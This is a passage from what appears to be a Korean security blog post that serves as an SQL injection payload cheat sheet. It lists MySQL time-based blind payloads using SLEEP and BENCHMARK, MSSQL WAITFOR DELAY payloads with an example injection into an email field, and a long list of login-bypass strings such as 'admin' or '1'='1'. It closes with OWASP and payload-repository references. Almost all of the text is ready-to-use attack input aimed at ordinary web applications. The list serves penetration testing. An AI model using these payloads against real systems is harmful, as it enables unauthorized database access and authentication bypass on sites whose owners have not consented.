")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337

BENCHMARK:
AND / OR를 대체할 수 있음
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337

MSSQL Server Blind : Time Based

 아래 Payload를 이용하는 경우 취약한 서버는 5초 대기 후 응답을 보낸다.

;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--

Pyload Test

MSSQL을 사용하는 웹 애플리케이션 있다고 가정하자. 여기서 이메일 입력 부분에서 위에서 살펴본 Payload를 이용하여 SQL Injection 테스트를 진행한다면 아래와 같이 시도할 수 있다.

email=test@gmail.com ' WAITFOR DELAY '0:0:5'--

SQL Injection 인증 우회

'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*

Reference

Testing for SQL Injection (OTG-INPVAL-005)
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

SQL Injection Bypassing WAF
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

Reviewing Code for SQL Injection
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

PL/SQL:SQL Injection
https://www.owasp.org/index.php/PL/SQL:SQL_Injection

Testing for NoSQL injection
https://www.owasp.org/index.php/Testing_for_NoSQL_injection

SQL Injection Query Parameterization Cheat Sheet
https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html

SQL detection and Exploitation:
http://www.securityidiots.com/Web-Pentest/SQL-Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md

반응형